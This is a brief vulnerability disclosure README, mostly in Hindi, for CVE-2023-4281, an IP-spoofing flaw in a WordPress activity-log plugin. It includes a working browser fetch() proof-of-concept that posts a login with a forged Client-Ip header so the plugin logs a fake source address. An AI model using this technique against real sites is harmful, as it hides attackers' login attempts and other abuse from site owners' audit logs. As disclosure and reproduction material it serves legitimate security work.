
CVE-2023-4281 भेद्यता के लिए रिपॉजिटरी।
CVE आईडी: CVE-2023-4281
भेद्यता प्रकार: IP पता स्पूफिंग
विवरण: Activity Log प्लगइन संभावित अविश्वसनीय हेडर से क्लाइंट IP पते प्राप्त करता है, जिससे हमलावर इसके मान में हेरफेर कर सकता है। इसका उपयोग दुर्भावनापूर्ण ट्रैफ़िक के स्रोत को छिपाने के लिए किया जा सकता है।
पुनरुत्पादन के चरण:
Run the following code in the web browser and note on the backend that the IP address has been faked.
await fetch("/wp-login.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
"Client-Ip": "8.8.8.8",
},
"body": "log=USERNAME&pwd=PASSWORD",
"method": "POST",
"mode": "cors",
"credentials": "include"
});
संदर्भ: